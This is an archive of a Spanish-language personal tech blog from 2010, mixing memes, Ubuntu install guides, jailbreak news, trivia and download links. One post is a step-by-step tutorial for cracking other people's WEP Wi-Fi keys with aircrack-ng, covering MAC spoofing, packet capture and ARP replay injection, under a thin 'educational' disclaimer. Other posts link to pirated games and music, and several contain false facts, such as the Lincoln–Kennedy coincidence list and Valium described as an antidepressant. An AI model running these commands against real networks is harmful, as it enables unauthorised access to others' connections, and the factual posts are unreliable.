25.5.10

Horrible accidente de F1



LOL
Continuar leyendo...

24.5.10

Problema de suma



Vamos a pensar un poco, y resolvamos !!!

2 + 3 = 10
7 + 2 = 63
6 + 5 = 66
8 + 4 = 96

Entonces:

9 + 7 = ¿¿??
Continuar leyendo...

14.5.10

Infierno Geek

Continuar leyendo...

iPad controlado por SSH desde PC con jailbreak



En este vídeo puede verse como tienen acceso por SSH con una Shell de root, con lo que tienen permisos para realizar lo que quieran sobre el dispositivo. Si eres curioso lo harás. es bueno experimentar con lo nuevo :P



Vía | iPhoneApps
Continuar leyendo...

13.5.10

Playboy incluirá una playmate en 3D con la edición de junio



Como se ha venido viendo, el futuro del entretenimiento es 3D, desde salas de cine hasta televisores nos ha mostrado el potencial que tiene este nuevo formato, pero ¿El porno de la vieja escuela donde quedó?

Mientras periódicos de Bélgica y China experimentan con publicidad y contenidos en 3D, Playboy anuncia que su próximo número será vendido con unas gafas especiales (anaglifas) para ver a la Playmate del mes exhibida en 3D en la página central.

Esta idea ya había sido examinada por Hugh Hefner en 1950 pero desechó la idea cuando descubrió lo caro que sería incluir las gafas. Ahora gracias a que HBO quería una manera creativa de promover la serie "True Blood", Playboy aprovecha para ofrecer una imagen en 3D de la modelo estadounidense Hope Dworaczyk.

No es la primera vez que una revista incluye gafas para mostrar contenidos 3D, pero (aparte de las revistas eróticas para ciegos) posiblemente Playboy sea la primera en traer imágenes de este tipo.

En el 2006 la revista Rolling Stone en su edición número 1000 mostró una portada 3D que no requería gafas (impresión lenticular) con 154 celebridades. En la actualidad muchas revistas ya experimentan con la realidad aumentada, cambiando las gafas por una webcam.

Vaya que toda esta realidad aumentada estará presente en TODOS los aspectos.

Vía | FayerWayer
Continuar leyendo...

12.5.10

Captcha del blog solucionado



Recientemente me notificaron que el captcha tenia errores y no se mostraba completo así que opte por quitarlo para que los comentarios sean mas fluidos y sin perder tanto tiempo escribiendo un código.

Ahora podrán comentar sin problemas :P
Continuar leyendo...

11.5.10

Tres buenos videos de Chatroulette



Chatroulette es una caja de Pandora. Uno se puede encontrar con algo aburrido, divertido, original, pantallas en negro y, sobre todo, muchos más penes de los que puedan imaginar. Sin embargo, la creatividad de ciertos usuarios nos muestra una vez más que cualquier plataforma es un campo con potencial para hacer cosas entretenidas.

A continuación se mostrarán tres videos de usuarios que lograron divertir a más de uno en Chatroulette, y lo grabaron para que todos los podamos ver, la verdad es que están muy divertidos y a mi gusto el primero.

1. Un papel de costado con la frase "Si giras la cabeza, yo gano"



2. Un papelito con una banana dibujada pide a los que están del otro lado que bailen o se larguen. Compaginado con música, queda muy divertido



3. La Rana René (o Kermit) "dándose placer" en una divertida parodia a todos los que utilizan Chatroulette para mostrarle al mundo cómo se tocan. Para reírse un rato largo



Vía | Acceso Directo
Continuar leyendo...

10.5.10

Spirit, jailbreak rápido, sencillo y fácil de usar para iPhone, iPod Touch y iPad



Con la salida del iPad era cuestión de tiempo que apareciera una aplicación para hacer jailbreak al dispositivo y así poder instalar todas esas aplicaciones que Apple no quiere que instalemos. Eso sumado al tethered jailbreak (jailbreak que se inhabilita al apagar el dispositivo) de los últimos iPhones y iPod Touch hacían imprescindible una nueva herramienta para jailbreak.

Las plegarias fueron escuchadas y entonces apareció Spirit, la herramienta para jailbreak más impresionante que se ha visto hasta el momento.

Spirit es realmente fácil de usar, conectamos el dispositivo al ordenador mediante el cable USB, abrimos Spirit, le damos al botón Jailbreak y listo, en cuestión de cinco minutos tenemos Cydia en nuestro iPhone, iPod Touch y iPad. Si a esto le sumamos que resuelve el problema del tethered jailbreak pues la verdad es que Spirit se hace imprescindible.

Actualmente existen versiones para Windows y Mac y tiene muy pocos requisitos: Tener un dispositivo activado (no activa dispositivos, solo hace jailbreak), iTunes 9 (o posterior), y firmware 3.1.2, 3.1.3, o 3.2. Además se recomienda sincronizar antes el dispositivo con el ordenador para guardar una copia de nuestros datos, ya que en muchos casos Spirit elimina las fotos que tenemos guardadas en èl..

Lo dicho, actualmente es la mejor aplicación que podemos encontrar para jailbreak, ya que no tiene ningún tipo de complicación y hasta el usuario más novato podría hacer el proceso sin problemas (siempre siguiendo las indicaciones).

Vía | Genbeta
Descarga | Spirit
Más información | Jailbreak
Continuar leyendo...

6.5.10

Revista Año Cero, Más allá del 2012 [Mayo 2010]


PDF | 53 MB


Descarga | Revista Año Cero Mayo 2010
Continuar leyendo...

Soundtrack Iron Man 2 de AC/DC



Esta vez le toco a AC/DC, una banda de hard rock formada en Sydney (Australia) en 1973 por los hermanos escoceses Malcolm y Angus Young, tomar papel del soundtrack de la segunda saga de Iron Man. Son 15 canciones clásicas de la legendaria banda, las cuales fueron elegidas entre los 10 álbumes que editaron a lo largo de su carrera. Éstos se publicaron entre 1976 y 2008


Descarga |
Continuar leyendo...

4.5.10

Bit.ly ha cambiado su apariencia



Mientras publicaba la entrada anterior, al recortar la url para colocarla en Twitter, me dí cuenta de que bit.ly ha rediseñado su apariencia y se ve, a mi gusto, mejor y mas actual :P. Tal vez sea un simple cambio pero quise hacerlo saber
Continuar leyendo...

FreeSMS, envío de mensajes de texto gratis



FreeSMS es una pequeña aplicación que pesa alrededor de 44KB y que en su mínimo peso tiene la capacidad de enviar mensajes de texto gratuitos a casi cualquier parte del mundo. Es tan fácil de usar y tan efectivo en esos casos cuando nuestro tiempo aire esta agotado. La versión más estable es la 1.4.8.

Descarga | FreeSMS 1.4.8
Continuar leyendo...

2.5.10

Instalar Ubuntu 10.04 desde un pendrive con Universal USB Installer

En el post anterior utilizamos UNetbootin para instalar el nuevo Ubuntu desde una memoria usb, pues ahora utilizaremos el Universal USB Installer para el mismo fin.

Instalar Ubuntu 10.04 desde un pendrive

1. Descargamos la aplicación.



2. En el paso 1 de la imagen, seleccionaremos la distribución que se insertará en la USB, si ya la tiene descargada el programa la buscará y colocará la ruta en el paso 2; en caso contrario, el programa la descargará. Después elegimos la Unidad y si queremos que se formatee también la elegimos. Al final damos clic en Create y empezará el proceso de instalación.

3. Reiniciamos y booteamos desde la USB.

Tan sencillo como parece.

Descarga | Universal USB Installer
Continuar leyendo...

Instalar Ubuntu 10.04 desde un pendrive con UNetbootin

Con el reciente lanzamiento de Ubuntu Lucid Lynx, todos quieren instalarlo para probar las novedades de las que tanto se hablan solo que algunos ya pudieron grabar su LiveCD y algunos no tienen ni un disco en blanco a la mano o les da flojera ir al cyber para comprar uno :p pero si cuentan con una memoria usb o pendrive... entonces debes seguir este tutorial para que lo puedan instalar desde ahí.

Instalar Ubuntu 10.04 desde un pendrive

1. El software que utilizaremos será el UNetbootin



2. Si aun no han descargado la distribución, su opción será la de color azul (Distribución) eligiendo Ubuntu y enseguida la versión 10.04. Después seleccionarán en Tipo: Unidad USB y la Unidad donde lo vayan a instalar, dan clic en Aceptar y empezará a descargarse para que al final se instale en su memoria usb.

3. Si ya tienen descargada la distribución, su opción será la de color rosado (DiscoImagen) eligiendo ISO y enseguida le ruta donde se encuentra su LiveCD. Después seleccionarán Tipo: Unidad USB y la Unidad donde lo vayan a instalar, dan clic en Aceptar y empezará a instalarse en su memoria usb, este proceso es más rápido porque ya no se descargará nada.

4. Reiniciamos y booteamos desde la USB.

A disfrutar de Lucid Lynx !!!

Descarga | UNetbootin
Descarga | Ubuntu 10.04
Vía | Paraiso Linux
Continuar leyendo...

1.5.10

Coincidencias sorprendentes: Abraham Lincoln y John F. Kennedy



Hemos sabido que en todo el mundo existe las coincidencias o tal vez el destino sea quien nos controle, pero esta vez las relaciones que hay entre los ex-presidentes norteamericanos Abraham Lincoln y John F. Kennedy, las cuáles son tan exactas que sorprenden y causan un poco de intriga, por que los parecidos de la vida y destinos de estos dos hombres es muy similar.

  • Abraham Lincoln, fue electo al Congreso en 1846.
  • John F. Kennedy, fue electo al Congreso en 1946.
  • Lincoln fue electo Presidente en 1860.
  • Kennedy fue electo Presidente en 1960.
  • Los Nombres de Lincoln y Kennedy, contienen cada uno de ellos 7 letras.
  • Ambos concentraron sus esfuerzos hasta el último día de sus vidas a Los Derechos Civiles.
  • Ambos fueron asesinados por balazos en la cabeza.
  • Ambos Presidentes fueron tiroteados en día Viernes.
  • Las esposas de ambos perdieron un hijo viviendo en la Casa Blanca.
  • Lincoln tenia un Secretario de apellido Kennedy.
  • Kennedy tenia una Secretaria de apellido Lincoln.
  • Ambos fueron asesinados por individuos que eran sureños.
  • Ambos fueron sucedidos en el Gobierno por sureños.
  • Ambos sucesores fueron de apellido Johnson.
  • Andrew Johnson, quien fue el sucesor de Lincoln nació en 1808.
  • Lyndon B. Johnson, quien fue el sucesor de Kennedy, nació en 1908.
  • John Wilkes Booth, fue quien asesinó a Lincoln, y nació en 1839.
  • Lee Harvey Oswald, fue quien asesinó a Kennedy, y nació en 1939.
  • Ambos asesinos fueron conocidos por el Mundo con sus tres nombres.
  • Ambos nombres son conformados por 15 letras.
  • Ambos criminales huyeron corriendo del lugar de los hechos.
  • Ambos fueron capturados a los minutos después del Magnicidio donde se ocultaban.
  • Booth huyó corriendo del Teatro donde disparó a Lincoln y se escondió en una Bodega.
  • Oswald huyó corriendo una Bodega desde donde disparó a Kennedy y se escondió en un Teatro.
  • Ambos homicidas fueron asesinados antes de comparecer en un Juicio.
  • Una semana antes de ser asesinado, Lincoln había estado en Monroe, Maryland
  • Una semana antes de ser asesinado, Kennedy había estado con Marilyn Monroe.
  • Ambos Presidentes tenían más de 6 pies de estatura. Ambos fueron hombres atléticos.
  • Ambos disfrutaban sentarse en una silla mecedora. Ambos gustaban de las citas Bíblicas y las de Shakespeare.
  • Ambos fueron capitanes de barcos
  • Ambos estaban con sus esposas al momento de sendos atentados y ninguna de ellas resultaron lesionadas y ambas sostuvieron las cabezas de sus esposos cuando se encontraban heridos de muerte.
  • Lincoln fue balaceado en el Teatro "Ford". Kennedy lo fué en una limousine "Lincoln", producto de "La Ford".
  • Lincoln se encontraba sentado en el Teatro en el balcón 7; Kennedy se encontraba en el vehículo 7 de la caravana presidencial.
  • Ambos Presidentes murieron en los lugares donde intentaron salvar sus vidas y que sus nombres comenzaban con "P" y con "H", en el caso de Lincoln, murió “Paterson House” y Kennedy falleció en el "Park Hospital".
  • Ambas autopsias fueron practicadas por personal médico militar y ambos mandatarios fueron sepultados en ataúdes de caoba.-
  • Los restos de ambos Presidentes descansan muy cerca el uno del otro. La Sra. Kennedy, insistió de que la cercanía entre ambos catafalcos fuera el mínimo.

Impresionante no?

Vía | Dogguie
Continuar leyendo...

QuickLife



Vía | Vagabundia
Continuar leyendo...

30.4.10

¿Cuál es el Sistema Operativo más utilizado en la actualidad?

StatCounter es uno de los sistemas de analítica más utilizados, por eso su servicio Global Stats es una excelente fuente de información, se basa en una muestra de usuarios que acceden a más de 3 millones de sitios.

Tal como se nota en la imagen de abajo, Windows XP es el SO más utilizado.



Y si cambiamos de vista a la de Líneas, nos daremos cuenta de que existe un descenso importante de XP que coincide con el aumento de uso de Vista y sobre todo el reciente Windows 7, actualmente con un 13% del mercado.



Siguiendo una línea de las estadísticas, concuerdo con SpamLoco el año que sigue tal vez Windows 7 sea el segundo más utilizado mientras que Vista se irá alejando de nuestra vida poco a poco; pero por otro lado, Mac ha crecido durante los últimos 12 meses y Linux sigue siendo el sistema operativo "extraño" para la mayoria de los usuarios, que me gustaría que más usuarios prueben este sistema anotando ventajas y desventajas.

Vía | SpamLoco
Continuar leyendo...

Super Mario Galaxy



Un poco de humor geek :P

Vía | Geektoon
Continuar leyendo...

Rediseño del reproductor de YouTube



Hace un par de días me dí cuenta de que el reproductor de YouTube había sido remodelado por uno que al parecer se ve mucho mas actual, claro no esta disponible aun en todos los videos.

Diseño anterior



Nuevo diseño



Un video para que noten el nuevo diseño. Que les parece?
Continuar leyendo...

Ubuntu 10.04 esta listo para su descarga



Tras una larga espera, la más reciente versión de Ubuntu, la 10.04, se encuentra por fin disponible para cualquier persona interesada en probarlo.

Novedades

Con esta nueva versión de Ubuntu, tenemos un look completamente nuevo (cambiaron de skin), dejando atrás tantos tonos marrones por una interfaz que se ve más seria y actualizada.

Además, Ubuntu 10.04 traer ahora un "Me Menu", que se encarga de manejar toda nuestra actividad social en la web, desde un sólo menú. Desde ahí, tendremos acceso a Facebook, Twitter, además del Chat, inmediatamente:



La otra gran novedad, es que ahora Ubuntu trae un reproductor musical integrado con una tienda musical, que nos permite comprar canciones con un par de clicks. Esto podemos anexarlo al Ubuntu One (básicamente el Dropbox de Ubuntu: almacenamiento online), y poner toda nuestra música en la web, para escucharla donde sea.



Si desean conocer el resto de las novedades, puedes verlas aquí.

Para usuarios de Windows

La mejor manera de probar Ubuntu, sin recurrir al lento LiveCD, o poner "en riesgo" nuestro disco duro y evitar particiones, es utilizando Wubi.

Lo que Wubi hace es, básicamente, instalar Ubuntu como una aplicación más de Windows. Cuando reiniciemos la máquina, nos dará la opción de cargar o Ubuntu, o Windows.



¿Se aburrieron de Ubuntu? No hay problema! Simplemente eliminan a Ubuntu como si fuese otra aplicación de WIndows, y el sistema continuará funcionando sin problemas!

Esta es la mejor manera de instalar Ubuntu si ya tienen Windows en la PC y no están seguros de querer amarrarse con Ubuntu por siempre. Y si, nos dará una velocidad nativa para Ubuntu, salvo en la carga inicial, que demorará un poquito más.

Ubuntu installer para Windows(WUBI)

De hecho lo estoy descargando en este momento porque ya ansió probarlo :P, ustedes no?

Vía | Arturogoga
Descarga | Ubuntu 10.04
Descarga WUBI | Wubi Windows
Más novedades | Lista de novedades
Continuar leyendo...

29.4.10

Iron man 2 se estrenará mañana



Iron Man 2 es una próxima película a estrenarse el 30 de abril de 2010 en España y el 29 de abril en latinoamerica, dirigida por Jon Favreau, escrita por Justin Theroux y protagonizada por Robert Downey Jr.. Esta es la segunda película de una trilogía sobre Iron Man, que también esta comprendida dentro del megaproyecto coral de The Avengers.

Aunque en el video dice que es en Mayo, mañana se estrenará aqui en México.



Más información | Ironman 2
Continuar leyendo...

Detectan por primera vez hielo de agua en un asteroide



Por primera vez dos equipos de investigadores independientes confirman la existencia de hielo de agua en la superficie de un asteroide cercano, un descubrimiento que podría llevar a explicar la manera como se formaron los océanos en la Tierra.

El asteroide conocido como 24 Themis y que no es más que una gran roca que recorre el espacio en el cinturón de asteroides ubicado entre Marte y Júpiter está cubierto por una capa de escarcha. Pero ese no es la única sorpresa con la que se encontraron los investigadores, ya que también lograron identificar material orgánico cuyas moléculas podrían ser parte de los ingredientes necesarios para la existencia de vida. Claro que en relación a este último tema los científicos se mostraron bastante más cautos, señalando que aún no encuentran las suficientes evidencias como para afirmar que efectivamente existe vida en el asteroide.

Para dar con las pruebas concretas de la existencia de hielo de agua en la superficie de 24 Themis los investigadores midieron las características específicas que se generan luego que la luz solar rebota en su superficie. De esta manera lograron concluir que gran parte de los 198 Km de diámetro de la roca se encuentran cubiertos por hielo de agua.

Es sabido que los cometas que orbitan en zonas más lejanas del Sistema Solar tienen agua, pero los científicos pensaban que los asteroides –como el 24 Themis- que se encuentran más cerca del Sol no podían tenerla debido a que se evaporaría. De hecho los científicos creen que uno de los asteroides más grandes del Sistema Solar y que hoy es conocido como Planeta Enano (Ceres), podría alojar grandes cantidades de agua congelada bajo su superficie rocosa y cubierta de polvo.

Para los científicos es de suma importancia este descubrimiento ya que confirmaría la teoría que sugiere que, para que se formaran los océanos en la Tierra, necesariamente debía provenir del espacio.

A lo largo de su historia la Tierra ha sido bombardeada por una infinidad de rocas provenientes del espacio. Se cree que una gran roca la impactó hace unos 4.500 millones de años provocando que se desmembrara un trozo de ella que, con posterioridad, formaría la Luna.

Producto de dicha colisión se habría elevado de tal manera la temperatura en nuestro planeta, que habría evaporado toda el agua que habría existido en ella. Entonces los científicos llevan años tratando de explicar cómo se generaron los actuales océanos.

De ahí que se postulara la idea de que el agua que finalmente formó los océanos provino de otros asteroides -de menor tamaño- que impactaron la Tierra en épocas posteriores a esta gran colisión. Pero para que esta teoría fuera validada debía comprobarse que los asteroides portan agua y que esta tiene la misma composición a nivel atómico y de isótopos que la existente en la Tierra. Lo primero quedaría demostrado con este descubrimiento, por lo que los científicos deben ahora comprobar las características propias del agua encontrada en el asteroide para compararla con la existente en la Tierra.

Vía | FayerWayer
Más información | Space
Continuar leyendo...

21.4.10

Plants vs Zombies [FULL PC]



Una horda de divertidos zombis se prepara a invadir tu casa, y tu única línea de defensa es un arsenal de 49 plantas atrapazombis. Utiliza plantas y mucho más para liquidar a 26 tipos de Zombies antes de que lleguen a tu puerta.

Cada zombi tiene sus propias habilidades especiales. Piensa rápido y planta veloz para combatirlos. Pero no olvides planear tu siembra de semillas y vegetales. Al luchar contra los incoherentes muertos vivientes, obstáculos como el atardecer, niebla y una piscina agregan dificultad. ¡Con cinco modos de juego en los que enterrarse, la diversión nunca muere!

  • Prueba cinco modos de juego: Aventura, Mini-juegos, Puzzle, Sobrevivencia y el tranquilo Jardín Zen
  • Conquista los 50 niveles del modo Aventura --durante el día, noche, en la niebla, piscina y techo.
  • Lucha con 26 zombis distintos.
  • ¡Obtén 49 poderosas perennes y consigue monedas para comprar un caracol de mascota, nuevos ítems y mucho más!

Lo descargue hace un par de horas y la verdad es que esta genial, muy entretenido y verás que si lo empiezas a jugar no querras parar :P

Descarga | Plants vs Zombies
Web Principal | Plants vs Zombies
Continuar leyendo...

20.4.10

Android VS iPhone



LOL
Continuar leyendo...

Como romper contraseñas WEP y WAP con Backtrack [Tutorial]

Material

  • Sistema operativo Backtrack 3
  • Tarjeta inalámbrica :P

Introducción

Primero que nada, este tutorial pretender ser educativo lo que el usuario haga aprendiendo de aquí, es su responsabilidad.

¿Para que queremos crackear una contraseña? Eso no importa, esto es meramente educativo y un reto para algunos.

También es para demostrar lo frágil que es la seguridad de nuestros proveedores de Internet y antes que nada hay que saber que tan "seguro" es la encriptación WEP.

Segun Wikipedia

Es el sistema de cifrado incluido en el estándar IEEE 802.11 como protocolo para redes Wireless que permite cifrar la información que se transmite. Proporciona un cifrado a nivel 2, basado en el algoritmo de cifrado RC4 que utiliza claves de 64 bits o de 128 bits.

Y como dato curioso también nos dice Wikipedia, que este sistema de seguridad se "dejo de utilizar " en el 2003 y fue reemplazado por WAP.

Pero hoy en día se sigue utilizando la encriptación por WEP, siendo la mas utilizada todavía.

Empecemos

Ya que sabemos que es WEP, falta conocer que es Backtrack.

Es un sistema operativo con kernel de Linux que es utilizado exclusivamente para hacer test de seguridad no es necesario instalarlo ya que es un LiveCD. Lo pueden conseguir aquí: Backtrack (va en la versión 4)

Con estas instrucciones podemos crackear las WEP y WAP

Instrucciones:


  1. Abrimos la consola, aparece en la barra principal como una pantallita negra que me recuerda a la consola de comandos de Windows.
  2. Lo primero que debemos saber es que tipo de interface es nuestra tarjeta inalámbrica por lo que pondremos el comando airmon-ng
  3. Ahora aparecerá al final algo como eth1 o wlan0 o algo parecido esa es la interfac.
  4. Incluimos el cádigo arimon-ng stop (interface)
  5. Pondremos ifconfig (interface) down
  6. Como todo buen hacker informático, debemos cuidar la seguridad y cambiaremos la mac usando macchanger --mac00:11:22:33:44:55 (interface)
  7. Aparecera un lindo mensaje que te hara sentir hacker bien, y ahora activamos nuestra tarjeta usando el comando airmon-ng start (interface)
  8. Ahora revisaremos todas las redes "disponibles" airodump-ng (interface)
  9. Ya que se muestren todas pulsamos "Ctrl+c" para detenerlo.
  10. Cuando sepamos cual queremos usamos el siguiente comando, llenando adecuadamente cada campo que se pide esto es muy sencillo airodump-ng -c (channel) -w ("nombre de archivo") --BSSID (BSSID) (interface)
  11. Ahora abrimos una nueva consola, dejamos trabajando la anterior y ponemos esto aireplay-ng -1 0 -a (BSSID) -h 00:11:22:33:44:55 (interface)
  12. Tenemos que esperar a que nos salga que ha salido correcto al final aparecera esto :-) (algo similar LOL)
  13. Cuando salga la carita pondremos aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)
  14. Abrimos una nueva consola y para finalizar ponemos aircrack-ng -b (BSSID) ("nombre del archivo"-01.cap)
  15. Y hemos finalizado solo es cuestión de que el programa crackee la contraseña.

Vía | Internet-END
Continuar leyendo...

Apps Execute: inicia aplicaciones desde ejecutar [Windows]



Hace mucho tiempo me daba cuenta de que no todas las aplicaciones que se instalaban en Windows se agregaban al registro para su ejecución desde EJECUTAR (Windows+R) como en Linux, así que me dedique a la tarea de hacer una pequeña aplicación en Batch para que puedan añadir sus programas y así puedan iniciarlos directamente desde la ventana de Ejecutar. Ya lo tenía desde hace mucho solo que creí que ya lo había posteado :P

Espero les sirve, les dejo el código y la aplicación ya "compilada" para su uso.

@echo off
color 0B
title Apps Execute
mode con cols=65 lines=15
:menu
set "file="
set "name="
set "temp0="
set "temp1="
set "opc="
cls
echo Abrir Archivos de programa? S/N
set /p filesp=">> "
if /i ["%filesp%"] == ["S"] (start %systemdrive%\Archiv~1)
echo.Arrastre aqui su archivo [exe]
set /p file=">> "
call:com %file%
call:error1 %file%
echo.Nombre que usara para ejecutar su programa
set /p name=">> "
REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\%name%.exe" /ve /d %file% /f >nul
echo.
echo.Programa %name% agregado !!!
msg * Para verificar: Escriba [%name%] o [%name%.exe] en [Ejecutar]
ping -n 4 localhost >nul
echo.Desea agregar otro programa [Y/N]
set /p opc=">> "
if /i ["%opc%"] == ["Y"] (goto:menu) else (msg * Gracias por usar Apps Execute&exit)
:com
set temp0=%1
if not [^%temp0:~0,1%] == [^"] (set file="%file%"&goto:eof) else (goto:eof)
:error1
set temp1=%1
if /i not ["%temp1:~-5,4%"] == [".exe"] (echo. Error23: Archivo invalido&pause>nul&goto:menu)
goto:eof

Descarga | Apps Execute
Continuar leyendo...

19.4.10

Mamá geek



Cuando sea mi momento, a mi esposa también le compraré una de esas :P, ustedes no?
Continuar leyendo...

La tripulación Enola Gay



Paul Tibbets, Robert Lewis, Thomas Ferebee, Theodore Van Kirk, William Parsons, Jacob Beser, Morris Jeppson, George Caron, Wyatt Duzenberry, Joe Stiborik, Robert Shumard y Richard Nelson. Son los nombres de los 12 tripulantes que el 6 de agosto de 1945, a bordo del bombardero Enola Gay, lanzaron la bomba atómica sobre Hiroshima.

Se estima que entre 70.000 y 80.000 personas, el 30% de la población de dicha ciudad japonesa, murieron instantáneamente, mientras que 70.000 más resultaron heridas de diversa consideración. En los años posteriores, otras 100.000 perecieron a causa de las quemaduras o por las radiaciones a las que se vieron sometidas.

Vía | Abadia Digital
Continuar leyendo...

5 beneficiados por calentamiento global



Mientras que en la mayor parte del planeta se esta sufriendo mucho por este gran problema del calentamiento global, otros lugares se están beneficiando con este horror y lo están aprovechando muy bien.

1. Groenlandia (Greenland en inglés) está empezando a hacer honor a su nombre convirtiéndose en una tierra más verde. Al parecer las inmensas capas de hielo están desapareciendo dejando más y más tierra arable al descubierto. Los 58.000 groenlandeses ya han empezado a aprovechar esta ventaja cultivando brócoli durante los meses de verano.

2. Las medusas están haciéndose más grandes. A pesar de que la mayor parte de las criaturas oceánicas están pasando tiempos difíciles, las medusas en cambio entran en su edad de oro. Por alguna razón, el alza en la acidificación y en las temperaturas les viene de perlas a estos gelatinosos seres. Seguramente la sobrepesca a la que sometemos a sus depredadores también ha ayudado, y para más INRI esto último les hace tocar a mucho más plancton que antes. Lo dicho, buenos tiempos para las medusas… malos para los bañistas.

3. Las montañas crecen. Si, yo también me he quedado atónito al leer esto. Según leo, los glaciares en recesión han liberado a las cumbres de su pesada carga de hielo, lo cual les está permitiendo alcanzar su verdadera altura. De hecho el artículo dice que en el brazo occidental de los Alpes, las montañas crecen a un ritmo de 0,088 centímetros por año. Al final va a resultar que el último que suba al Everest se quedará con la gloria.

4. Viruela. En diciembre de 1979 la OMS declaró erradicada esta enfermedad, que acabó con la vida de 500 millones de personas durante el siglo XX. Ahora parece que el calentamiento global, que está fundiendo las capas de hielo de la tundra, podrían liberar de nuevo a este pequeño virus atrapado en las burbujas de aire, y es que este bichito puede vivir varias décadas enterrado en el hielo. Tranquilos, si esto termina por suceder… tenemos una vacuna efectiva.

5. Satélites que giran más rápido. Los expertos en comunicaciones llevan años detectando pequeñas variaciones en la velocidad orbital de los satélites, que algunas veces aceleran y otras se refrenan. Pronto se descubrió una correlación entre estas variaciones y el ciclo solar de 11 años de las manchas solares. Resulta que las manchas (que se producen por una intensa actividad magnética) alteran la densidad de los gases de la termosfera, la capa exterior de nuestra atmósfera por la que pululan nuestros satélites. A menor densidad en la termosfera, más rápido viaja el Meteosat y viceversa.

Pero es que además el aumento de CO2 en la atmósfera está alterando también la termosfera, haciéndola menos densa y por tanto acelerando la velocidad de nuestros satélites. Y al parecer esto nos está beneficiando porque los satélites se enfrentan a menos resistencia lo cual disminuye el número de correcciones de curso a realizar. Obviamente esto alarga la vida operativa de los satélites, así que las empresas que los encargaron están realmente contentos.

Vía | Maikelnai`s Blog
Continuar leyendo...

18.4.10

Evitar conteo de espera en Rapidshare y Megaupload [Chrome]



Cada que encontramos algún juego o película muy pesada en la red y esta dividida como en 1 millón de partes, se nos hace eterno descargar cada parte porque los servidores de alojamiento como Rapidshare y Megaupload tienen un conteo de espera que en vez de esperar nos desespera :P así que si quieres evitar esto, descargate el Google Chrome (navegador de Google) para que puedas instalarle 2 extensiones muy valiosas que te ayudarán con este problema.

Megaupload DownloadHelper
Rapidshare DownloadHelper

Vía | Código Geek
Continuar leyendo...

Maravillas de la arquitectura moderna

Desde tiempos remotos, el humano ha tenido la necesidad y a su vez una gran imaginación para crear diferentes tipos de construcciones y monumentos que dentro muchos, algunos son catalogados como maravillas que sin duda alguna el nombre lo dice todo.

Catedral de Ulm

En Alemania se erige una gigantesca Catedral que comenzó a construir en el siglo XIV pero que termino recién en el año 1890. Icono de la Iglesia Luterana, esta edificación goza de ser la Catedral más alta del mundo y tiene aproximadamente unos 163 m de altura.



Biosfera 2

Con una superficie de 1.27 hectáreas, el ecosistema artificial cerrado de la Biosfera 2 se alza sobre el desierto de Arizona, Estados Unidos. Hecha completamente de cristales, este "invernadero gigante" se utilizó para experimentar la viabilidad de biosferas cerradas para la colonización del espacio.



Edificio Flatiron

Quienes hayan viajado a Nueva York seguramente escucharon hablar del edificio Flatiron, el primer rascacielos de la ciudad. Era el edificio más alto de la región, cuando termino de construir en 1902. De forma triangular y con un diseño hermoso, el Flatiron es uno de los tantos iconos característicos de Nueva York.



Las Torres Petronas

Probablemente las hayas visto en alguna serie de televisión o alguna película. Las Torres Petronas desafían el firmamento de Kuala Lumpur (Malasia), no sólo por su altura, sino también por su majestuosa belleza.



El nido de los pájaros

Con ese nombre se lo conoce vulgarmente al Estadio Nacional de Pekín (otra mega estructura China). Acogió a las ceremonias de las Olimpiadas del 2008. Es la estructura de acero más grande del mundo, aunque solo llevo cinco años su construcción.



La Ópera de Sydney

Terminada en 1973, con un diseño totalmente vanguardista, la Ópera de Sydney es una estructura fabulosa y hermosa. En ella se brindan los conciertos de ópera, ballet y teatro más prestigiosas del mundo.



La Cúpula del Milenio

Para empezar el tercer milenio, Gran Bretaña ideo este mega domo de 365 m de diámetro, uno por cada día del año y cien metros de altura. Estuvo abierto desde el primero de enero del 2000 hasta el treinta y uno de diciembre del mismo año, donde se realizaron diferentes exhibiciones artísticas. Por diversos problemas políticos y económicos, el domo permanece cerrado y con vistas de ser desmantelado.



Edificio de China Central Television

China tiene su televisión manejada por el estado a la que denomino China Central Television. En el año 2007 celebraron la finalización del edificio central; una mega estructura con forma un poco indefinida.



Burj Khalif

Cada día se reciben más noticias de Dubai debido a sus grandes estructuras y despilfarro de los jeques árabes. El Burj Khalif es el edificio más alto del mundo, midiendo unos 828 m.



Vía | Punto Geek
Continuar leyendo...

9.1.10

[Niñera virtual] Naomi el filtro anti-porno para Internet



Un filtro anti-porno es la aplicación ideal, por si te preocupa el contenido de las páginas a las que pueden acceder tus hijos en Internet. Si deseas instalar un potente filtro de contenidos en tu PC, te presentamos a Naomi. Este programa de filtro de contenidos, monitoriza constantemente nuestra conexión a Internet, sin hacerla lenta, en busca de contenidos inapropiados, cerrando nuestro navegador web inmediatamente en caso de que los encuentre.

El filtro de Naomi funciona además protegido con contraseña para evitar su desactivación.Naomi filtra material o contenido relacionado con violencia, terrorismo, pornografía, drogas, juegos online, etc. Además, esta aplicación utiliza una lista de filtros y un sistema de análisis heurístico y semántico. Finalmente, Naomi es muy fácil de usar, no hay que configurar nada, es totalmente automatizado y funciona bien con cualquier navegador web, además de ser una aplicación gratuita.

El año 2006 fue descontinuado el soporte para Naomi, sin embargo descargalo aún y funciona sin problemas.

Descarga | Naomi
Vía | Tecnología 21
Continuar leyendo...

7.1.10

Es un ave, es un avión....



Es un pajavión o un aviajaro xD. No cabe duda de que algunas cosas si son lo que parecen :P
Continuar leyendo...

Alcohol sintético que emborracha pero no da resaca (cruda)



Investigadores del Imperial College de Londres están trabajando en un compuesto químico que produce sensación de embriaguez, pero que no deja la consecuencia adversa de la resaca ("cruda" como se conoce vulgarmente) y cuyo efecto se podría cancelar inmediatamente con un antídoto (permitiendo, por ejemplo, estar sobrio para conducir).

En concreto, se está investigando con un grupo de sustancias llamadas benzodiazepinas. La sustancia más conocida dentro de esta familia es el diazepam, principio activo del popular antidepresivo Valium. Dentro de todas estas sustancias, se busca alguna que además de producir los efectos deseados, sea incolora e insípida, al igual que el etanol (nombre del alcohol que contienen las bebidas).

El ‘problema’, comercialmente hablando, es que esta sustancia necesitaría autorización farmacéutica para su distribución y consumo. Aunque la venta de un compuesto tóxico como el alcohol está autorizada por la tradición de su consumo, es difícil que sustancias sintéticas de efectos similares sea autorizada sin restricciones. Otra gran barrera para el lanzamiento a gran escala del producto son los ensayos clínicos, costosos y complicados.

